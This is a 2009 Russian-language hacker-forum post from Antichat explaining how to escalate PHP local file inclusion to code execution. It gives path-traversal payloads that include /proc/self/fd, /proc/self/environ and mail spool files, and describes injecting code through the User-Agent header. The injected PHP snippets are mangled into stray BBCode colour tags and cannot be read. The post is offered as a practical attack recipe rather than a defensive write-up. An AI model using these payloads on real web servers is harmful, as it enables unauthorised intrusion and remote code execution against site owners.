HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Default *log, *conf files locations
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 29.01.2009, 21:14
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
С нами: 10957346

Репутация: 2727


По умолчанию
1) юзаем логи, не зная к ним пути

a. /proc/%{PID}/fd/%{FD_ID}

%{PID} - пид

%{FD_ID} - ярлыки, (1,2,3,..,9) 2 и 7 логи апача (не факт что всегда, у меня были тоже 2 и 7)

/proc/self/status - смотрим пид

/proc/%{PID}/fd/%{FD_ID} -> /proc/3661/fd/2

index.php?inc=../../../../../proc/3661/fd/2

User-Agent:

Код:
dr-x------ 2 www-data www-data  0 Jan  2 18:27 .
dr-xr-xr-x 6 www-data www-data  0 Jan  2 18:27 ..
lr-x------ 1 www-data www-data 64 Jan  2 18:27 0 -> /dev/null
l-wx------ 1 www-data www-data 64 Jan  2 18:27 1 -> pipe:[3113414]
l-wx------ 1 www-data www-data 64 Jan  2 18:27 2 -> /var/log/apache2/error.log
lrwx------ 1 www-data www-data 64 Jan  2 18:27 3 -> socket:[2714910]
lr-x------ 1 www-data www-data 64 Jan  2 18:27 4 -> pipe:[2714921]
l-wx------ 1 www-data www-data 64 Jan  2 18:27 5 -> pipe:[2714921]
l-wx------ 1 www-data www-data 64 Jan  2 18:27 6 -> /var/log/apache2/access.log
lrwx------ 1 www-data www-data 64 Jan  2 18:27 7 -> /anon_inode:[eventpoll]
lrwx------ 1 www-data www-data 64 Jan  2 18:27 8 -> socket:[2742717]
lr-x------ 1 www-data www-data 64 Jan  2 18:27 9 -> /proc/27262/fd
b. напрямую

index.php?inc=../../../../../proc/self/fd/2

User-Agent:

2) переменные окружения (если неправильно понял - поправьте)

index.php?inc=../../../../../proc/self/environ

POST:

User-Agent:

3) mail

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"fuckme"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR] 
index.php?inc=../../../../../var/mail/ololo

index.php?inc=../../../../../var/spool/mail/ololo

зы.

/proc/version

/proc/self/cmdline

/proc/devices

по мотивам

Код:
http://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/
http://www.milw0rm.com/papers/260
http://itbloggen.se/cs/blogs/secteam/archive/2009/01/26/alternative-ways-to-exploit-PHP-remote-file-include-vulnerabilities.aspx
__________________
ПИУ-ПИУ...
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.